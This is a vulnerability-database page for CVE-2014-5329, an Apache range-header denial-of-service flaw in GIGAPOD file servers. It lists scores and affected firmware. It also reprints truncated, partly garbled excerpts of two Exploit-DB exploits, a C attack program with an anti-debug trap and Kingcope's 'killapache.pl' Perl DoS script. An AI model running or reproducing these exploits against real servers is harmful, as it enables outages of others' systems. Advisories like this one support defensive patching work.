CVE-2014-5329
published 2023-09-08CVE-2014-5329: GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administrative…
PriorityP349high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
1.65%
73.6th percentile
GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administrative operation.
8001/tcp is served by a version of Apache HTTP server containing a flaw in handling HTTP requests (CVE-2011-3192), which may lead to a denial-of-service (DoS) condition.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tripodworks | gigapod_2010_firmware | <= 3.01.02 | — |
| tripodworks | gigapod_3_firmware | <= 3.01.02 | — |
| tripodworks | gigapod_officehard_firmware | <= 3.04.03 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apache - Denial of Service
exploitdb·2011-12-09·CVSS 7.8
CVE-2014-5329 [HIGH] Apache - Denial of Service
Apache - Denial of Service
---
/*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getadd
Exploit-DB
Apache - Remote Memory Exhaustion (Denial of Service)
exploitdb·2011-08-19
CVE-2014-5329 Apache - Remote Memory Exhaustion (Denial of Service)
Apache - Remote Memory Exhaustion (Denial of Service)
---
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$kstart and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
P
No writeups or analysis indexed.
2023-09-08
Published